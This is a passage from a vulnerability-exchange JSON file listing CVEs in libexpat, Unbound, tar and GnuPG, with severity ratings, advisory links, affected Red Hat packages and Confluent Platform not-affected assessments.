          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        416
      ],
      "description": "libexpat before 2.8.2 does not consider XML_TOK_DATA_CHARS in doCdataSection and thus lacks handler call depth tracking for various calls from within handlers in cases of a policy violation. Thus, a use-after-free can occur. NOTE: this issue exists because of an incomplete fix for CVE-2026-50219.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56412"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56412"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1278"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56412"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56412"
        }
      ],
      "published": "2026-06-21T17:16:44+00:00",
      "updated": "2026-06-23T15:31:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-56416",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L"
        }
      ],
      "cwes": [
        354
      ],
      "description": "In NLnet Labs Unbound up to and including version 1.25.1, when the validator builds the canonical RDATA form for an RRSIG-covered PX/RP/MINFO/SOA RRset, it computes the address of the second embedded domain name as 'datstart + dname_valid(datstart, ...)' and passes it straight to 'query_dname_tolower()' without checking that a second name is actually present in the RDATA. The wire-format parser accepts multi-dname RRs whose RDATA ends after the first name, so an attacker who runs a DNSSEC-signed authoritative server can deliver a record with an absent second domain name (e.g. SOA record) and cause 'query_dname_tolower()' to walk label-by-label through stale bytes in the per-worker 'env->scratch_buffer', past the end of that heap allocation if 'msg-buffer-size' has been lowered from the default. This leads to heap buffer overflow and on a release build the outcome relies heavily on the contents of the buffer tail and the adjacent heap chunk.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56416"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56416"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56416"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56416"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-56416.txt"
        }
      ],
      "published": "2026-07-22T14:17:22+00:00",
      "updated": "2026-07-24T14:25:29+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-5704",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        434
      ],
      "description": "A flaw was found in tar. A remote attacker could exploit this vulnerability by crafting a malicious archive, leading to hidden file injection with fully attacker-controlled content. This bypasses pre-extraction inspection mechanisms, potentially allowing an attacker to introduce malicious files onto a system without detection.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5704"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/11/10"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/11/11"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/12/2"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5704"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455360"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5704"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8477-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8477-2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8477-3"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5704"
        }
      ],
      "published": "2026-04-06T16:16:42+00:00",
      "updated": "2026-06-17T10:59:31+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-57062",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        1284
      ],
      "description": "CMS (Cryptographic Message Syntax) parsing in gpgsm in GnuPG through 2.5.20 mishandles the CMS format for AES-GCM because aes-ICVlen is supposed to be 12 bytes but 4 bytes is accepted. NOTE: this is related to CVE-2026-34182.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-57062"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-57062"
        },
        {
          "url": "https://blog.calif.io/p/how-to-format-a-ciphertext"
        },
        {
          "url": "https://github.com/advisories/GHSA-m6x2-4hhh-669j"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57062"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57062"
        },
        {
          "url": "https://www.gnupg.org/download"
        },
        {
          "url": "https://www.gnupg.org/download/"
        }
      ],
      "published": "2026-06-23T18:18:10+00:00",
      "updated": "2026-06-25T20:16:05+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.2.20-4.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5713",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        121,
        125
      ],
